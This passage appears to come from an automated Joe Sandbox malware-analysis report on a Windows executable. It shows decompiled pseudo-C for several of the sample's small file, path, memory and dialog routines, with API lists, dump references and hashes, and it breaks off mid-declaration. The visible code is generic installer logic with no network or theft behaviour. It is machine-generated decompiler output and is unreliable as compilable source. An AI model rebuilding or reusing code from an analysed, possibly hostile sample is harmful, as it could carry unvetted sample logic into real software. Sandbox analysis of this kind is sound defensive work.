                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                              • Opcode ID: 3b16cf9f5297afa35b1fed61b5092fd1f1cf67567c3d6cc9cccee9c584a191d8
                                                                                                                                                                                                                                              • Instruction ID: d2aeee86fb23cb3c19b6ce29cff9c5e5a054509f2400f5245ffb0221575c85f1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b16cf9f5297afa35b1fed61b5092fd1f1cf67567c3d6cc9cccee9c584a191d8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31014BA3E1557426F32440294C88FF7551CDBDAB35F1B4735BEAEE71D2D6644C0481E1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00974AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				int _t12;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				struct HWND__* _t21;
                                                                                                                                                                                                                                              				signed int _t24;
                                                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 =  *0x97858c; // 0x268
                                                                                                                                                                                                                                              				_t9 = E00973680(_t20);
                                                                                                                                                                                                                                              				if( *0x9791d8 == 0) {
                                                                                                                                                                                                                                              					_push(_t24);
                                                                                                                                                                                                                                              					_t12 = WriteFile( *(0x978d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t25 = _a12;
                                                                                                                                                                                                                                              						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              							_t14 =  *0x979400; // 0xcf400
                                                                                                                                                                                                                                              							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                              							 *0x979400 = _t15;
                                                                                                                                                                                                                                              							if( *0x978184 != 0) {
                                                                                                                                                                                                                                              								_t21 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x9793f8, 0);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return _t25;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x00974ad5
                                                                                                                                                                                                                                              0x00974adb
                                                                                                                                                                                                                                              0x00974ae7
                                                                                                                                                                                                                                              0x00974aee
                                                                                                                                                                                                                                              0x00974b05
                                                                                                                                                                                                                                              0x00974b0d
                                                                                                                                                                                                                                              0x00974b14
                                                                                                                                                                                                                                              0x00974b1a
                                                                                                                                                                                                                                              0x00974b1c
                                                                                                                                                                                                                                              0x00974b21
                                                                                                                                                                                                                                              0x00974b2a
                                                                                                                                                                                                                                              0x00974b2f
                                                                                                                                                                                                                                              0x00974b31
                                                                                                                                                                                                                                              0x00974b39
                                                                                                                                                                                                                                              0x00974b54
                                                                                                                                                                                                                                              0x00974b54
                                                                                                                                                                                                                                              0x00974b39
                                                                                                                                                                                                                                              0x00974b2f
                                                                                                                                                                                                                                              0x00974b0f
                                                                                                                                                                                                                                              0x00974b0f
                                                                                                                                                                                                                                              0x00974b0f
                                                                                                                                                                                                                                              0x00974b5e
                                                                                                                                                                                                                                              0x00974ae9
                                                                                                                                                                                                                                              0x00974aed
                                                                                                                                                                                                                                              0x00974aed

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00973680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0097369F
                                                                                                                                                                                                                                                • Part of subcall function 00973680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009736B2
                                                                                                                                                                                                                                                • Part of subcall function 00973680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009736DA
                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00974B05
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1084409-0
                                                                                                                                                                                                                                              • Opcode ID: 860fd14ddb49cd293bed24b3e131acfa3c5c82baf1266d8292af6c0b7f20d20f
                                                                                                                                                                                                                                              • Instruction ID: 955e0153505aa0aa35a32428d84faa97f1686803b09a5756d53dc79cf1f19b40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 860fd14ddb49cd293bed24b3e131acfa3c5c82baf1266d8292af6c0b7f20d20f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0016D33254211ABD7148F58DC09BAA7769E784725F04C265F93D961E1CB70DC92DB40
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E0097658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				intOrPtr _t4;
                                                                                                                                                                                                                                              				char* _t6;
                                                                                                                                                                                                                                              				char* _t8;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				char* _t16;
                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                              				char* _t19;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = __ecx;
                                                                                                                                                                                                                                              				_t10 = __edx;
                                                                                                                                                                                                                                              				_t17 = __ecx;
                                                                                                                                                                                                                                              				_t1 = _t17 + 1; // 0x978b3f
                                                                                                                                                                                                                                              				_t12 = _t1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t4 =  *_t17;
                                                                                                                                                                                                                                              					_t17 = _t17 + 1;
                                                                                                                                                                                                                                              				} while (_t4 != 0);
                                                                                                                                                                                                                                              				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                              				_t2 = _t18 + 1; // 0x978b40
                                                                                                                                                                                                                                              				if(_t2 < __edx) {
                                                                                                                                                                                                                                              					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                              					if(_t19 > __ecx) {
                                                                                                                                                                                                                                              						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                              						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                              							 *_t19 = 0x5c;
                                                                                                                                                                                                                                              							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t6 = _a4;
                                                                                                                                                                                                                                              					 *_t19 = 0;
                                                                                                                                                                                                                                              					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                              						_t6 = _t6 + 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return E009716B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0x8007007a;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x00976592
                                                                                                                                                                                                                                              0x00976594
                                                                                                                                                                                                                                              0x00976596
                                                                                                                                                                                                                                              0x00976598
                                                                                                                                                                                                                                              0x00976598
                                                                                                                                                                                                                                              0x0097659b
                                                                                                                                                                                                                                              0x0097659b
                                                                                                                                                                                                                                              0x0097659d
                                                                                                                                                                                                                                              0x0097659e
                                                                                                                                                                                                                                              0x009765a2
                                                                                                                                                                                                                                              0x009765a4
                                                                                                                                                                                                                                              0x009765a9
                                                                                                                                                                                                                                              0x009765b2
                                                                                                                                                                                                                                              0x009765b6
                                                                                                                                                                                                                                              0x009765ba
                                                                                                                                                                                                                                              0x009765c3
                                                                                                                                                                                                                                              0x009765c5
                                                                                                                                                                                                                                              0x009765c8
                                                                                                                                                                                                                                              0x009765c8
                                                                                                                                                                                                                                              0x009765c3
                                                                                                                                                                                                                                              0x009765c9
                                                                                                                                                                                                                                              0x009765cc
                                                                                                                                                                                                                                              0x009765d2
                                                                                                                                                                                                                                              0x009765d1
                                                                                                                                                                                                                                              0x009765d1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009765dc
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(00978B3E,00978B3F,00000001,00978B3E,-00000003,?,009760EC,00971140,?), ref: 009765BA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharPrev
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 122130370-0
                                                                                                                                                                                                                                              • Opcode ID: 1c16ec555212d4e3c112d81d7055262f432d67be0523d592882b2c9376211366
                                                                                                                                                                                                                                              • Instruction ID: ff404a3c21344a7ce246afeb00a4ea6244a60f0fef1b28a02fc1746c37eb8b9d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c16ec555212d4e3c112d81d7055262f432d67be0523d592882b2c9376211366
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5F04C33108A519BD332091D9884B66BFDE9BC6350F28856EF8DEC3205DA659C45E3A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E0097621E() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					0x4f0 = 2;
                                                                                                                                                                                                                                              					_t9 = E0097597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E009744B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					_t9 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x00976229
                                                                                                                                                                                                                                              0x00976230
                                                                                                                                                                                                                                              0x00976247
                                                                                                                                                                                                                                              0x0097626a
                                                                                                                                                                                                                                              0x00976272
                                                                                                                                                                                                                                              0x00976249
                                                                                                                                                                                                                                              0x00976255
                                                                                                                                                                                                                                              0x0097625f
                                                                                                                                                                                                                                              0x00976264
                                                                                                                                                                                                                                              0x00976264
                                                                                                                                                                                                                                              0x00976284

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0097623F
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                                • Part of subcall function 00976285: GetLastError.KERNEL32(00975BBC), ref: 00976285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 381621628-0
                                                                                                                                                                                                                                              • Opcode ID: 7decc4b09584055a04c01e2fb481acbf1dd8caebf36bb137dd2b3c59faebfb47
                                                                                                                                                                                                                                              • Instruction ID: 0ee40a997abd3ee2d4900742cc6057268c30d1832f4d026e734e87b15338eb9f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7decc4b09584055a04c01e2fb481acbf1dd8caebf36bb137dd2b3c59faebfb47
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26F0E972704208ABE790EB748D06FBE37ACDBC4700F408469BA8DD6092ED749D849650
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00974B60(signed int _a4) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t15 + 0x978d64)) != 1) {
                                                                                                                                                                                                                                              					_t9 = FindCloseChangeNotification( *(_t15 + 0x978d74)); // executed
                                                                                                                                                                                                                                              					if(_t9 == 0) {
                                                                                                                                                                                                                                              						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0x978d60)) = 1;
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x978d60)) = 1;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x978d68)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x978d70)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x978d6c)) = 0;
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              0x00974b66
                                                                                                                                                                                                                                              0x00974b74
                                                                                                                                                                                                                                              0x00974b98
                                                                                                                                                                                                                                              0x00974ba0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974bac
                                                                                                                                                                                                                                              0x00974ba4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974ba4
                                                                                                                                                                                                                                              0x00974b78
                                                                                                                                                                                                                                              0x00974b7e
                                                                                                                                                                                                                                              0x00974b84
                                                                                                                                                                                                                                              0x00974b8a
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00974FA1,00000000), ref: 00974B98
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                                                              • Opcode ID: 77cd980a9777c909a90651445a39838cb49a7c9d3dc8e404ec046a9a9dbac7ee
                                                                                                                                                                                                                                              • Instruction ID: 17216285aba23f6c1c8c324db7d13ec74d59124e1319bdfc0297366c275ce308
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77cd980a9777c909a90651445a39838cb49a7c9d3dc8e404ec046a9a9dbac7ee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EF0FE73684B08DE47718E398C09657BBE8AAD53A1710492A946ED21D1FB30AC41DB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E009766AE(CHAR* __ecx) {
                                                                                                                                                                                                                                              				unsigned int _t1;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                              				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                              					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              0x009766b1
                                                                                                                                                                                                                                              0x009766ba
                                                                                                                                                                                                                                              0x009766c7
                                                                                                                                                                                                                                              0x009766bc
                                                                                                                                                                                                                                              0x009766be
                                                                                                                                                                                                                                              0x009766be

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,00974777,?,00974E38,?), ref: 009766B1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                              • Opcode ID: 3c31dd7371e205f981d7a136a85c8f8b84b4daaa042ca1d6d30b0ec709afd0f1
                                                                                                                                                                                                                                              • Instruction ID: 097bb2f0e166b207d52f560eada93882669caf5dcd72c3998d1d5eecb3c36010
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c31dd7371e205f981d7a136a85c8f8b84b4daaa042ca1d6d30b0ec709afd0f1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AB09277236840426E2006316C2955A2845B6C223A7E85B90F03AC01E0DA3EC886E004
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00974CA0(long _a4) {
                                                                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              0x00974caa
                                                                                                                                                                                                                                              0x00974cb1

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000000,?), ref: 00974CAA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocGlobal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3761449716-0
                                                                                                                                                                                                                                              • Opcode ID: fb88c65b08c59dff2a937e8b500ad59515f36683870af7f0de5e0bc3a616f04c
                                                                                                                                                                                                                                              • Instruction ID: bfece6c109d14248f037f70aa2f657922d6aa3fd704a16067acfe09cb2bb65b0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb88c65b08c59dff2a937e8b500ad59515f36683870af7f0de5e0bc3a616f04c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9B0123304820CB7CF001FC2EC09F893F5DF7C5771F140000F60C450508A729450969A
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00974CC0(void* _a4) {
                                                                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              0x00974cc8
                                                                                                                                                                                                                                              0x00974ccf

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeGlobal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2979337801-0
                                                                                                                                                                                                                                              • Opcode ID: 98c72cfb1c630024a448413f4c2679d25aadb92f9641b5d6bb2977dfe00784e1
                                                                                                                                                                                                                                              • Instruction ID: 9afe2095f5767586f1f3b62c5da8da6b5d54c7e4548a21d7e0aafc14a7abf2e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98c72cfb1c630024a448413f4c2679d25aadb92f9641b5d6bb2977dfe00784e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EB0123200410CBB8F001B42EC088493F1DD6C12707000010F50C410218B3398519589
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E00975C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                                                              				CHAR* _v265;
                                                                                                                                                                                                                                              				char _v266;
                                                                                                                                                                                                                                              				char _v267;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				CHAR* _v272;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				signed int _v296;
                                                                                                                                                                                                                                              				char _v556;
                                                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				CHAR* _t69;
                                                                                                                                                                                                                                              				signed int _t71;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				char _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				intOrPtr _t88;
                                                                                                                                                                                                                                              				void* _t100;
                                                                                                                                                                                                                                              				intOrPtr _t101;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				intOrPtr _t105;
                                                                                                                                                                                                                                              				void* _t111;
                                                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                                                              				CHAR* _t118;
                                                                                                                                                                                                                                              				void* _t119;
                                                                                                                                                                                                                                              				void* _t127;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				void* _t132;
                                                                                                                                                                                                                                              				void* _t142;
                                                                                                                                                                                                                                              				signed int _t143;
                                                                                                                                                                                                                                              				CHAR* _t144;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				void* _t146;
                                                                                                                                                                                                                                              				void* _t147;
                                                                                                                                                                                                                                              				void* _t149;
                                                                                                                                                                                                                                              				char _t155;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				void* _t162;
                                                                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                                                                              				char _t167;
                                                                                                                                                                                                                                              				char _t170;
                                                                                                                                                                                                                                              				CHAR* _t173;
                                                                                                                                                                                                                                              				void* _t177;
                                                                                                                                                                                                                                              				intOrPtr* _t183;
                                                                                                                                                                                                                                              				intOrPtr* _t192;
                                                                                                                                                                                                                                              				CHAR* _t199;
                                                                                                                                                                                                                                              				void* _t200;
